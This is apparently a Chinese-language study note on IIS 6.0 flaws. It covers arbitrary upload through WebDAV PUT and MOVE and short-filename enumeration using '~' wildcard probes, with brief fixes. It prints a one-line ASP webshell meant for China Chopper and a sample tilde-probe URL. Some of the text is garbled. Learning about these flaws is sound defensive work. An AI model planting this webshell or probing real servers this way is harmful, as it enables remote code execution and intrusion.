IIS6.0漏洞学习-PUT漏洞和短文件名解析漏洞

it2023-02-18  82

简介

IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003-起发行,但在Windows XP Home版本_上并没有IIS。IIS是一 -种Web (网页)服务组件,其中包括Web服务器、FTP服务器、 NNTP服务器和SMTP服务器, 分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)。上 发布信息成了一件很容易的事。

1、PUT漏洞原理:

IIS Server在Web服务扩展中开启了WebDAV,配置了可以写入的权限,造成任意文件上传。

2.利用工具进行文件上传

3.尝试上传jsp一句话

4.上传一句话txt文件,然后利用move方式将txt后缀名更改为asp

Move如果不成功,需要开启配置网站脚本资源访问

yijuhua.txt文件内容

<% if request("a")<>"" then execute request("a") %>

菜刀连接

修复: 关闭webdav,和文件写入权限。

短文件名解析漏洞

短文件名特征

漏洞原理: 攻击者使用通配符"*“和”?"发送一个请求到IIS,当IIS接收到一个文件路径中包含“~"请求时, 它的反应是不同的,即返回的HTTP状态码和错误信息不同。基于这个特点,可以根据HTTP的响应区分一个可用或者不可用的文件。访问构造的某个存在的短文件名,会返回404; 访问构造的某个不存在的短文件名,会返回400 (报错页面)

手工测试短文件名解析

猜测的语句:

http://192.168.0.128/c*~1*/.aspx

工具进行短文件名测试

工具地址:短文件名工具 漏洞修复

最新回复(0)